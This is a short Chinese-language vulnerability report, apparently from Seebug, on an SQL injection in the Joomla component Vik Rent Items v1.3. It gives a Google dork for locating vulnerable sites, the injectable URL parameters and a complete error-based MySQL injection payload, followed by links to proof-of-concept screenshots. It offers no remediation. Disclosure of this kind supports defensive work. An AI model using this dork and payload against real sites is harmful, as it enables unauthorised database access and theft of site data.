Joomla! Component Vik Rent Items v1.3 - SQL Injection
Joomla! Component Vik Rent Items v1.3 ,存在参数过滤不严,导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,
Google Dork:
inurl:index.php?option=com_vikrentitems
注入点:
http://localhost/[PATH]/index.php/en/?option=com_vikrentitems&task=showprc&itemopt=[SQL]&days=2&pickup=1490790600&release=1490947200&place=[SQL]&Itemid=132
payload:
/?option=com_vikrentitems&task=showprc&itemopt=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(md5(233),0x716b627171,(SELECT (ELT(4375=4375,1))),0x71706b7a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- zGDb&days=2&pickup=1490790600&release=1490947200&place=1&Itemid=132
测试截图:
![](https://images.seebug.org/contribute/265b94e1-37ab-405b-983b-cfb3941653f9)
注入:
![](https://images.seebug.org/contribute/c6284632-0ef2-443e-a208-2b6b314e7f3c)
PoC验证:
![](https://images.seebug.org/contribute/b59a79ef-1e8b-403b-835b-72c6fc33d196)
暂无评论